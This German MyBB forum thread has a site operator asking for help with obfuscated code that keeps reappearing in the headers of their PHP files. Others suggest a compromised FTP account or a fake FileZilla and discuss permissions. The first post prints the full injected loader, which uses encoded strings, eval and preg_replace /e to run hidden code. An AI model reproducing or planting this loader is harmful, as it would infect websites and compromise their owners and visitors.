+- MyBB.de Forum (https://www.mybb.de/forum)
+-- Forum: Archiv (https://www.mybb.de/forum/forum-57.html)
+--- Forum: MyBB 1.6.x (https://www.mybb.de/forum/forum-58.html)
+---- Forum: Allgemeiner Support (https://www.mybb.de/forum/forum-59.html)
+---- Thema: Spamcode in den PHPs (/thread-30092.html)
Spamcode in den PHPs - Kater Murr - 22.07.2014
Hallo zusammen,
ich habe zwar die Boardsuche benutzt, aber bei Begriffen wie "unerwünschter Code in php-Dateien" kommt leider alles oder gar nichts.
Seit gestern habe ich in so ziemlich allen php-Dateien im Header Codes, wie wie folgt aussehen:
Code:
<?php $zwyeubimau = '{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x55c%x7878pmpusut!-#j0#!%x5c%x782f!**#%x5c%x782f%x5c%x7825k5!<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825%x7825s:N}#-%x5c%x785c%x785csboe))1%x5c%x782f35.)1%x5c%x7825)7gj6<*id%x5c%x7825)ftpm825%x5c%x7824-%x5c%x7824*<!~!dsfb7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj)tutjyf%x5c%x78604%x5ch%x5c%x7825%x5c%x782f#0#%x5c%x782f*x5c%x7825)hopm3qjA)qj3hopmA%x5c%x7825c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTd]51]y35]256]y76]72]y3d]51]y35]fs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftm8256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x78248256<C%x5c%x7827pd%x5c%x78256|6.7e#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x51]278]y3e]81]K78:56985:6197gc%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%xx5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x7)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x7;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!s_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%w>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]2s.973:8297f:5297e:56-%x5c%x7878r.985:529ph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)]67]452]88]5]48]32M3]317]7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5<%x5c%x787fw6*CWtfs%x5c%x78|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-Nx7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%25o:W%x5c%x7825c:>1<%x5c%x7c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb66,#%x5c%x782fq%x5c%x7825>2q%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%60msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5j:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273qj%x5c%x78256<*Y%x5c%x7825)fnbox5c%x7860ftsbqA7>q%x5c%x78256<%x5c%]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c25Z<^2%x5c%x785c2b%x5c%rn chr(ord($n)-1);} @error_reportic%x78b%x5c%x7825w:!>!%x5c%x78246767~673]y76]258]y6g]273]y76]271]yzcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c]334]368]322]3]364]6]283]427]3c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825-bubx5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x78x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{f445]212]445]43]321]464]285c%x7825)!gj!|!*1?hmg%x5c82f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsx787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%14<Cw6<pd%x5c%x7825w6Z6<.5%x5cx7860QUUI&b%x5c%x7825!|!*)323zb))) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){retu7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x25!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x78252qj%x5c%x7825)7gj6<**2qj%5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%5r%x5c%x785c2^-%x5c%x7825hOh%x5%x7860hA%x5c%x7827pd%x5c%x78256<pd%xE{h%x5c%x7825)sutcvt)fubmg5fubmgoj{h1:|:*mmvo:>:iuhofm%x5Z;0]=]0#)2q%x5c%x7825l}S;7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#W%x5c%x7825hIr%x5c%x785c1^-%x5c%x782%x5c%x7825c!>!%x5c%x7825i%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%!|!*!***b%x5c%x7825)sf%x%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjud-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x52f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gx7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7823]273]y76]277#<%x5c%x7825t2w>#]y74]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824ng(0); preg_replace("%x2f%50%x2e%;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x78x74%141%x72%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])1%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x7825:-5ppde:4:|:**#ppde#x5c%x7825tmw!>!#]y84]275]y85)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x78c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%5c%x7825w6Z6<.4%x5c%x7860hA%x5c%%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%7K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x78227bg39*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19270%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x2s)%x5c%x7825%x5c%x7824-%x5c#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W6<*)ujojR%x5c%x7827id%x5c%x78256x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5BFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x782]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]7876]62]y3:]84#-!OVMM*<%x22%51%x29%51%xoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x78602-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x57**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x78#W~!Ydrr)%x5c%x7825r%xdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825Goj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x55c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x78x5c%x7860%x5c%x7825}X273]y76]252]y85]256]y6g]257]y86uf%x5c%x7860gvodujpo)7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%fepdof.%x5c%x782f#@#%<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%xfvr#%x5c%x785cq%x5c%x78257%x67%42%x2c%163%x74%162%x5f%163%x76*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&82fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7q}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}25j>1<%x5c%x7825j=tj{fpg)%x5c%x7782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x7x7825)m%x5c%x7825=*h%x5c%x825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252c%x7825r%x5c%x7878<~!!%x5cj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h5%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%1424)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}25<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepd+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]26825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=t>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcv-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x782274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5sfmcnbs+yfeobz+sfwjidsb%c%x782f#00#W~!%x5c%x7825t2w)#2f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5u{66~67<&w6<*&7-#o]s]o]s]#Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5x7860opjudovg)!gj!|!*msY;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825x7825r%x5c%x7878B%x5c%x7825h>#]y3c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!UFH#%x5c%x7827rfs%x5c%x78256~c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x785c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%xj:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x7855mm!>!#]y81]273]y76]258]y6g]273]y76]4]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%xif((function_exists("%x6f%142%x5f%163%x7827pd%x5c%x78256<pc%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x7825j^%x5c%x7824-%x5c%x7824tvctuovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%d%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7827pd%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6%x5c%x7825tjw!>!#]y8t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x2,*j%x5c%x7825-#1]#-bubE{h%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x6<%x5c%x787fw6<*K)ftpmdXA6%x7824*<!%x5c%x7825kj:!>!#]y3x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw4]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x782fqp%x5c%x7825>5h%x5c%x7827825mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x78%x7825)!gj!<**2-4-bubE{5c%x7824%x5c%x785c%x5##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x78%x78257%x5c%x782f7#@#7%x5c%x7R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33b7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvu,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,tmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,:74985-rr.93e:5597f-x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x85-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x5c%x7860bj+upcotn+qsvmt+fmhp29%73", NULL); }%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqptek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>Xx7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x5h!>!%x5c%x7825tdz)%x5c%x7t-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5]y72]254]y76]61]y33]68]y34]68]y3c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tz71]y7d]252]y74]256]y39]252]y83]273]y72]282#<!u%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%6]373P6]36]73]83]238M7]381]211M5sbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d3]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y7f%x5c%x787f%x5c%x787f%x5c%h%x5c%x7825)sutcvt)esp>hmg%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x782P7L6M7]D4]275]D:M8]Df#<%x5c%x7825tx7825)Rd%x5c%x7825)Rb%x5c]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_dR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs/(.*)/epreg_replacedhjzvivlgm'; $lsooozftzh = explode(chr((300-256)),'7880,38,4413,62,3104,65,2377,34,4333,33,2982,63,6768,63,6198,35,4934,57,4475,67,2411,37,3045,28,3479,36,4725,32,7918,20,8126,43,1089,61,761,34,7338,25,5018,46,5158,35,8332,53,3334,57,1150,64,667,40,7576,29,8385,26,1830,70,5193,55,4822,43,3309,25,472,36,2220,33,2476,55,8818,29,2855,63,6173,25,5533,65,2087,41,2253,35,8440,61,6233,48,5988,38,8169,57,1803,27,240,26,10070,36,1708,37,8956,44,5126,32,6047,66,4051,36,6862,58,7419,54,833,56,4366,47,2128,39,4660,65,2918,64,7396,23,2628,59,3515,26,5665,61,6727,41,5924,64,8303,29,7938,49,3269,40,7073,52,9434,55,2830,25,8639,23,9864,29,4087,57,981,40,0,55,7605,57,2354,23,4194,37,4596,64,3213,56,437,35,3391,57,1555,70,6026,21,8545,33,112,70,3908,24,55,36,7242,24,9196,29,1507,48,1900,70,9975,25,1307,61,9719,69,1368,49,3073,31,9297,68,369,46,6548,40,2561,67,9632,55,5793,21,1214,49,3729,48,8915,41,599,68,4865,69,3541,31,4542,27,415,22,3932,58,8087,39,2687,65,9837,27,2752,53,9000,41,9041,35,795,38,2051,36,6920,48,5409,67,3777,44,8847,68,6325,64,3572,25,5476,57,9522,65,1417,50,9587,45,8226,20,8501,44,4569,27,4231,35,5814,31,10000,70,8246,57,6421,56,6281,44,6503,45,6477,26,3597,66,6588,64,2288,66,889,64,9893,48,7781,36,4266,67,3990,61,8662,21,8052,35,4991,27,9241,56,1021,68,3169,44,299,70,9096,42,5726,67,6389,32,266,33,5845,21,8683,65,8411,29,568,31,7172,70,5064,62,3699,30,3821,47,5598,22,7662,57,5866,58,508,60,3663,36,3448,31,7266,29,7363,33,3868,40,7473,33,953,28,9076,20,1467,40,9138,58,5312,60,8748,70,4144,50,9941,34,5620,45,5248,64,7125,47,9408,26,6113,60,1650,58,2531,30,9687,32,1625,25,2805,25,7817,63,202,38,7295,43,6652,26,182,20,1970,27,7031,42,6678,49,7719,62,7987,65,1997,54,1745,58,7506,70,4757,65,9365,43,8578,61,6831,31,707,54,91,21,2167,53,2448,28,1263,44,6968,63,9489,33,9788,49,5372,37,9225,16'); $msbhnvvxnh=substr($zwyeubimau,(32680-22574),(44-37)); if (!function_exists('wvbktwehnc')) { function wvbktwehnc($vygalwnmqy, $irprdthgze) { $glkrkjgweh = NULL; for($irovgknzhn=0;$irovgknzhn<(sizeof($vygalwnmqy)/2);$irovgknzhn++) { $glkrkjgweh .= substr($irprdthgze, $vygalwnmqy[($irovgknzhn*2)],$vygalwnmqy[($irovgknzhn*2)+1]); } return $glkrkjgweh; };} $mtamlcenic="\x20\57\x2a\40\x64\163\x66\153\x6b\161\x77\163\x78\153\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\64\x33\55\x32\60\x36\51\x29\54\x20\143\x68\162\x28\50\x35\63\x31\55\x34\63\x39\51\x29\54\x20\167\x76\142\x6b\164\x77\145\x68\156\x63\50\x24\154\x73\157\x6f\157\x7a\146\x74\172\x68\54\x24\172\x77\171\x65\165\x62\151\x6d\141\x75\51\x29\51\x3b\40\x2f\52\x20\155\x6c\144\x69\165\x65\163\x6c\153\x61\40\x2a\57\x20"; $kumjzdnyfw=substr($zwyeubimau,(31703-21590),(49-37)); $kumjzdnyfw($msbhnvvxnh, $mtamlcenic, NULL); $kumjzdnyfw=$mtamlcenic; $kumjzdnyfw=(607-486); $zwyeubimau=$kumjzdnyfw-1; ?><?php
/**Diese Spamcodes zerschießen natürlich alles. Ich habe daraufhin gestern alles runtergeworfen und eine saubere Version vom 1.6.14 wieder aufgespielt, nachdem ich vorsorglich auch meinen Rechner und die Dateien gescannt habe, damit da nicht der Fehler sitzt.
Danach ging wieder alles, aber heute ist der Mist schon wieder da, ohne dass ich zwischendurch auf das FTP zugegriffen hätte. Es hat auch außer mir niemand FTP-Zugangsdaten usw. Es kann also nicht von einem PC kommen.
Kann mir jemand sagen, wie ich den Mist wieder loswerde? Ich wollte schon die CHMOD-Rechte einschränken, aber das geht ja nur bedingt, weil das Forum ja gewisse Rechte braucht.
Vielen Dank schon mal und viele Grüße.
RE: Spamcode in den PHPs - StefanT - 22.07.2014
Was sagt dein Hoster zu dem Problem? Möglicherweise wurde dein FTP-Account gehackt.
RE: Spamcode in den PHPs - Kater Murr - 22.07.2014
Habe ihm gerade erst geschrieben und warte noch auf die Antwort. Über das FTP kann ich dagegen aber nichts tun?
Also der Support sagt mir nur, ich solle mein FTP-Passwort ändern und alle CHMODs auf 750 setzen. Aber wenn ich mich nicht täusche, dann läuft das MyBB doch nicht, wenn ich nur 750 zulasse, oder?
RE: Spamcode in den PHPs - MrBrechreiz - 22.07.2014
Welches FTP Programm verwendest Du ?
FileZilla ?
Falls ja, hat vor noch nicht so langer Zeit, Stefan hier im Forum einen Hinweis gegeben, bezüglich auf FileZilla.
https://www.mybb.de/forum/thread-29089.html
RE: Spamcode in den PHPs - Kater Murr - 22.07.2014
Ja, ich nutze FileZilla, aberich hatte es eigentlich von der Originalseite.
Aber danke für den Hinweis, sobald ich zuhause bin, werde ich das checken.
RE: Spamcode in den PHPs - Kater Murr - 22.07.2014
Ich habe FileZilla nun neu installiert. Ich bin nicht sicher, ob es eine gefakte Version war.
Jedenfalls habe ich nun ein neues Passwort etc. und das Problem, dass das Forum nicht funktioniert, wenn ich die Ordner auf 750 stelle (außer die, die laut Installationsdatei 777 brauchen). Welche Rechte muss ich denn mindestens vergeben haben?
Und kann mir eine .htaccess-Datei helfen?
RE: Spamcode in den PHPs - StefanT - 22.07.2014
Ohne die Ursache für den Hack zu kennen, können wir dir leider keine konkreten Tipps geben. Wenn es über FTP ablief, kannst du mit den Rechten rein gar nicht bewirken.